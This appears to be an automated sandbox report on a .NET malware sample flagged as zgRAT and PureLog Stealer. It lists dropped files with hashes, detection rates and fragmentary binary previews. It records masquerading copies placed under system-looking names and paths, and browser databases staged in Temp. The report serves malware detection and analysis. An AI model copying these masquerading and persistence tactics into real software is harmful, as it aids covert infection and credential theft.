                                                    Preview:oLaueiDqkiLqLBcaXixYb5lP6KvcDmNw6iHYJm7rPXnCwnKPirp1NldtkKyTwln8UYum4DQvlGIDSicTAg3W6WiUFYx9yo4otorY3iUfa4PHcZbBreTQrQC8zZhgPR67LeTn1EZcLY6BHb1q6vRTVo6dmsidAxPI7S58FxKmE1ETUA1Yh0jdAnmhi0AIf6bYIxDyf3kJloOdknIm1K5KOvIUqYZOxBHIZqKg7C2oPa1VYI65sYQVARJWpsIHdWVkhGE4clpzSR4x4x6icefZuvIIgy1O3vK3ERxSECdHsbCsXWc2wko8060v75Ynua5hGAsn9oeZBYqTtavKV8cTGLCIaBUIozXSfflWnz2IFP7cPhChJNSv8la58kM7TVvMBYxNyZggFTN1Ok238x9ahlT3EqYCm5yudua1tysurvpoXjqXrT8gWVpZE3JIBe3KedXeJBJKEPtv6ofeAAVT6SYIFBx0pktN1eK4MLNpJybHm3cZXoHAIkOMEPZIOTedgg4celSyxpJH0RfLiXcAcsERP7z6wEb0U8lG9A4wWTNcaHVxtOk00dAxbmMgvVBsOTw2qZLicqoJfl0ImBNiek907xoWxYABReOHUcHTCCYKz1RzwE4uIdOnT642vyuEpn1AXsxJ43fbMzBGfykseQ3yQkyYiOiNRTeM9RcDRuzO7wbe4xW6OCkZuDuw4YlqVRJ2UzHOWgbtbo0dJUdu1l9PtFb5gpJ2IJ2pnjKFqIjrl08FNQnj41yuS4IOXMrrWilRwK0kKYDtBSo2HWrQBj7RUIXta5rea2UCPqSCaDZgxEs9PPHBebqwkT6owHJOrjTJ7lnaDo08KbdQZYdKxqA8Lhc5toQS3KyOujComr7zlsmJ0qPYo9bAjU7ZJsqYYhE9mPfzWziGsK

                                                    C:\Program Files\7-Zip\Lang\upfc.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1912832
                                                    Entropy (8bit):7.536317571621779
                                                    Encrypted:false
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    MD5:6667F954763EEACF7EFFCF5A5C25E695
                                                    SHA1:6DB1FBA1CD1181B921CDADEBA24C69CD680BE825
                                                    SHA-256:62B1BF60394248D2C743EC6DF0935D58E5009C9E04AAB52DA72AD712A57597B4
                                                    SHA-512:9CC3525D7B7926CAA3017FFC91E3262429C74A03C9BE10037D1BF416EE7DE812D60E2B1AFD87DFE1D5B2ECE3A21CFC4CACD4E79F0152AECC3E421F1996599D20
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q}f.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......0...x...............pj..-F.......................................0..........(.... ........8........E........N...*...)...8....(.... ....~j...{....:....& ....8....*(.... ....~j...{....:....& ....8....(.... ....~j...{v...:....& ....8y......0.......... ........8........E....;...........`...l...86...~....(C... .... .... ....s....~....(G....... ....8.......... ....~j...{....:....& ....8....r...ps....z*....~....(K...~....(O... ....?.... ....8O...~....:.... ....~j...{....91..

                                                    C:\Program Files\7-Zip\Lang\upfc.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\ProgramData\Microsoft\Windows\Start Menu\55b276f4edf653

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):223
                                                    Entropy (8bit):5.738464717581
                                                    Encrypted:false
                                                    SSDEEP:6:3zAzAPsRJnJH1jJy1wI+QQfEmBDwWpdXEShusu2:3/UR9Ji+QOvBD6Su12
                                                    MD5:9218D670D3C592AF326D0042E5FCE7D1
                                                    SHA1:5F1CD4F2D18BBD970261FC2623F6332405783EF4
                                                    SHA-256:54BA74B6170231CE6EA9C2B26DF856F314450C39689230C995985DEE886CC0AA
                                                    SHA-512:CAFE8FDF8063DEF8648DD54DB388A54C076BE3D6A2E4AD5A5A1968EFAAC0CC8262F608EDB4E8E231D9D2D9CDD4941BFD12A160043E24F9F3327190642DBA4063
                                                    Malicious:false
                                                    Preview:7bklt5mmEtRve1W3sL6WYqkz8oZARFJ7baf4Wy1FnGUbXtqfn104KXzR1umEflU9jTTDWch4U0sRWIbP84WaPPxDlNClLxjBvU2EZmILU6kToh5tTXGlO4tTfQcIZ5shQqfBQWzWvLGTpdYDSTSxq8x1liiIJ9vYNDC7B3d6itzDyaoC1Y0Gn50S3oarxqMvarGmaaCY0VP6JuDK4gRvJouRMuEXdvI

                                                    C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1912832
                                                    Entropy (8bit):7.536317571621779
                                                    Encrypted:false
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    MD5:6667F954763EEACF7EFFCF5A5C25E695
                                                    SHA1:6DB1FBA1CD1181B921CDADEBA24C69CD680BE825
                                                    SHA-256:62B1BF60394248D2C743EC6DF0935D58E5009C9E04AAB52DA72AD712A57597B4
                                                    SHA-512:9CC3525D7B7926CAA3017FFC91E3262429C74A03C9BE10037D1BF416EE7DE812D60E2B1AFD87DFE1D5B2ECE3A21CFC4CACD4E79F0152AECC3E421F1996599D20
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q}f.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......0...x...............pj..-F.......................................0..........(.... ........8........E........N...*...)...8....(.... ....~j...{....:....& ....8....*(.... ....~j...{....:....& ....8....(.... ....~j...{v...:....& ....8y......0.......... ........8........E....;...........`...l...86...~....(C... .... .... ....s....~....(G....... ....8.......... ....~j...{....:....& ....8....r...ps....z*....~....(K...~....(O... ....?.... ....8O...~....:.... ....~j...{....91..

                                                    C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Recovery\b83e72d5c7bd2d

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):277
                                                    Entropy (8bit):5.793605819173178
                                                    Encrypted:false
                                                    SSDEEP:6:uWdIRbart05x9rjhPeQLd482X5jGvC0+lij66hddfklIjSQ:rK5CytjxJI6a0+l066hdWC
                                                    MD5:95A825812FCA20220C502331B5BCB0B9
                                                    SHA1:CC558E599AB014B2436C84E3DF7DD35FFDEA39C2
                                                    SHA-256:0E2C1866BF7CD157550C9D4FA94AC29FA1E70DF04BB361279E51CE32A6E587B7
                                                    SHA-512:D2EE913B86BC1EC0CAB03F493EA6F0F1E7298A4F0F349A47506B3477084A7A034E5F3F069037D744C9F9236358143B9837AD780A7364EEDFFFD04FF348D46A8C
                                                    Malicious:false
                                                    Preview:Sq3IJkPxRZamv7yZpWo5EMXZGG6z140YsXclTm4wN81bGb1Jgn6ErgMFSeCCnZ5XjC4XeNFDb1rFV5SpPxTO7vqMLWSzj1IxDd2EgeoSh3m0yGuXLXx0GqayVsMI5Qdkt4C1DOIvIBrEI0XFl5oMDSrWDEtySgXQZCH3D2T7PCrE9VpeUGgAmRgaMpy9eTdlnapGteBtlq6BkmXrYOeLAXoHgqqYEUc5jFbiqjvzFwY5Uf0kSHkPyRlQwhkDxnoQOAbeLzAydoFN8sxA0GF7u

                                                    C:\Recovery\llflCdrMcgGB.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1912832
                                                    Entropy (8bit):7.536317571621779
                                                    Encrypted:false
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    MD5:6667F954763EEACF7EFFCF5A5C25E695
                                                    SHA1:6DB1FBA1CD1181B921CDADEBA24C69CD680BE825
                                                    SHA-256:62B1BF60394248D2C743EC6DF0935D58E5009C9E04AAB52DA72AD712A57597B4
                                                    SHA-512:9CC3525D7B7926CAA3017FFC91E3262429C74A03C9BE10037D1BF416EE7DE812D60E2B1AFD87DFE1D5B2ECE3A21CFC4CACD4E79F0152AECC3E421F1996599D20
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\llflCdrMcgGB.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\llflCdrMcgGB.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\llflCdrMcgGB.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\llflCdrMcgGB.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q}f.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......0...x...............pj..-F.......................................0..........(.... ........8........E........N...*...)...8....(.... ....~j...{....:....& ....8....*(.... ....~j...{....:....& ....8....(.... ....~j...{v...:....& ....8y......0.......... ........8........E....;...........`...l...86...~....(C... .... .... ....s....~....(G....... ....8.......... ....~j...{....:....& ....8....r...ps....z*....~....(K...~....(O... ....?.... ....8O...~....:.... ....~j...{....91..

                                                    C:\Recovery\llflCdrMcgGB.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1396
                                                    Entropy (8bit):5.350961817021757
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\StartMenuExperienceHost.exe.log

                                                    Download File
                                                    Process:C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\llflCdrMcgGB.exe.log

                                                    Download File
                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\upfc.exe.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Temp\9xoH1rvGc8

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\EERJVmti7C

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):98304
                                                    Entropy (8bit):0.08235737944063153
                                                    Encrypted:false
                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\FPVtplfwjV

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):51200
                                                    Entropy (8bit):0.8746135976761988
                                                    Encrypted:false
                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\G1fqHlPR84

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.243856189774723
                                                    Encrypted:false
                                                    SSDEEP:3:2zDWor5pbn:2z1zbn
                                                    MD5:5204A3BD7B852D5DF58EC915CB513C8F
                                                    SHA1:20B9478191B6864D73205237CD923A1B17C561EB
                                                    SHA-256:1C17E2095471A1AE2C56653F703726851D1E375CEFFF6F9F732A51FD32C25107
                                                    SHA-512:BF4DC7609E23658C664E21D78E406F6F6F790AB9CF6D15813DAA20729AE78B7B2ADBCC5B813A150ED2CCA9F174F13E53BE592683F9628DA4F7C6638EC16012C5
                                                    Malicious:false
                                                    Preview:SPqSVh36MapbZ6QXNe9ZnP1ql

                                                    C:\Users\user\AppData\Local\Temp\GuaAEdheNO

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\Ld3wQv6XcO

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1368932887859682
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                    MD5:9A534FD57BED1D3E9815232E05CCF696
                                                    SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                    SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                    SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\Lf13SaWgTu

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.8517407251719497
                                                    Encrypted:false
                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO4wxeHChWEE1:TeAFawNLopFgU10XJBOaT3
                                                    MD5:D0962B221779A756754334848DCFF184
                                                    SHA1:22CD3B9D687216E6921553F55958449CE7ABF05D
                                                    SHA-256:7BA5110096912E6B352060FFF79B07EA95CA114A13D3994D7814831DFAA649B8
